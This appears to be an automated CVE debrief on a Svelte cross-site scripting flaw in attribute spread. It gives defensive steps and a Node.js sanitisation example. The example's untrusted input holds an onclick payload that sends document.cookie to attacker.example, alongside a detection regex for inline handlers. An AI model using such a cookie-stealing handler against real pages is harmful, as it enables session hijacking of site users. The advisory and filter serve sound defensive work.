PatchSiren cyber security CVE debrief
CVE-2026-42599 sveltejs CVE debrief
CVE-2026-42599 is a MEDIUM severity vulnerability in Svelte, a performance-oriented web framework. Prior to version 5.55.7, an attacker who controls data that a component spreads onto an element as attributes can inject event handler attributes (`on*` attributes) into the rendered markup, a cross-site scripting weakness (CWE-79). The injected handler runs in the victim's browser when JavaScript is enabled and the event fires before Svelte's hydration reaches the affected element.
- Vendor: sveltejs
- Product: svelte
- CVSS: MEDIUM 5.1
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2026-06-09
- Original CVE updated: 2026-06-11
- Advisory published: 2026-06-09
- Advisory updated: 2026-06-11
Who should care
Developers running Svelte versions prior to 5.55.7, in particular those whose components spread user-controlled or external data onto elements as attributes (for example attribute objects built from API responses, query strings or CMS content). Applications that server-render such components are the ones exposed to the pre-hydration window described below.
Technical summary
The vulnerability lies in how Svelte renders attributes supplied through spread syntax. When the spread object comes from untrusted data, attacker-controlled keys are emitted as element attributes, so a key naming an event handler becomes an inline handler in the markup. Exploitation requires JavaScript to be enabled in the victim's browser and the event to fire before Svelte's hydration reaches the element; once hydration has processed the element the injected handler no longer takes effect, which limits the window but does not remove it for events that fire early (or on pages where hydration is slow or fails).
Defensive priority
MEDIUM
Recommended defensive actions
- Update Svelte to version 5.55.7 or later.
- Avoid using spread syntax to render attributes from untrusted data.
- Validate and sanitize user-controlled or external data before rendering it as element attributes.
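The following added example (not code from the Svelte project or this advisory) shows the second and third actions in plain Node.js: an untrusted attribute object is serialised the way server-rendered markup would carry it, first as-is and then after an allowlist filter that drops `on*` keys and refuses unsafe `href` schemes. `renderAttributes`, `sanitizeAttrs` and `hasInlineHandler` are hypothetical helpers written for this example, and the input object is constructed; Svelte's own spread implementation is not reproduced. The `href` scheme check goes slightly beyond the event handler case in the advisory, because an allowlist that passes `href` through unchecked would still leave a `javascript:` URL in the markup.

```javascript
// Added example, not Svelte project code. Models untrusted data reaching an
// element through attribute spread, and the filter to apply before spreading.

// Constructed untrusted input, e.g. parsed from a JSON API response.
const untrustedAttrs = {
  id: "profile-link",
  class: "btn",
  href: "/users/42",
  onclick: "fetch('https://attacker.example/?c=' + document.cookie)",
  ONMOUSEOVER: "alert(document.domain)",
};

// Hypothetical serialiser standing in for server-side attribute rendering:
// every key in the object becomes an attribute, which is the whole problem.
function renderAttributes(attrs) {
  return Object.entries(attrs)
    .map(([k, v]) => {
      const escaped = String(v).replace(/&/g, "&amp;").replace(/"/g, "&quot;");
      return `${k}="${escaped}"`;
    })
    .join(" ");
}

// Attributes a given component is prepared to accept from outside data.
const ALLOWED = new Set(["id", "class", "href", "title", "aria-label", "data-testid"]);

// Accept only same-origin paths, fragments, queries, or http(s) URLs for href;
// rejects javascript:, data:, and protocol-relative (//host) values.
function safeHref(value) {
  const v = String(value).trim();
  return /^(https?:\/\/|\/(?!\/)|#|\?)/i.test(v) ? v : null;
}

// Allowlist filter: drop event handlers in any letter case, drop anything not
// explicitly allowed, and validate href before letting it through.
function sanitizeAttrs(attrs, allowed = ALLOWED) {
  const clean = {};
  for (const [key, value] of Object.entries(attrs)) {
    const k = key.toLowerCase();
    if (/^on/.test(k)) continue;      // onclick, ONMOUSEOVER, ...
    if (!allowed.has(k)) continue;    // unknown keys never reach the element
    if (k === "href") {
      const href = safeHref(value);
      if (href === null) continue;
      clean[k] = href;
      continue;
    }
    clean[k] = value;
  }
  return clean;
}

// Cheap check usable in a test suite: does rendered markup carry any inline handler?
function hasInlineHandler(html) {
  return /(^|\s)on[a-z]+=/i.test(html);
}

// Vulnerable vs hardened rendering of the same untrusted object.
function demonstrate() {
  const vulnerable = renderAttributes(untrustedAttrs);
  const hardened = renderAttributes(sanitizeAttrs(untrustedAttrs));
  return { vulnerable, hardened };
}

console.log(demonstrate());
```

In a Svelte component the difference is `<a {...sanitizeAttrs(data)}>` instead of `<a {...data}>`; the allowlist belongs next to the component that knows which attributes it actually needs. Patching to 5.55.7 or later is still the primary fix; the filter removes the attacker-controlled keys regardless of how the framework treats them.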
Evidence notes
This CVE was published on 2026-06-09T17:17:07.550Z and modified on 2026-06-11T18:41:34.993Z. It has a CVSS score of 5.1 and is classified as CWE-79.
Official resources
- CVE-2026-42599 CVE record (CVE.org)
- CVE-2026-42599 NVD detail (NVD)
- Source item URL: nvd_modified
- Mitigation or vendor reference: svelte@5.55.7 - Release Notes
- Mitigation or vendor reference: svelte@5.55.7 - Vendor Advisory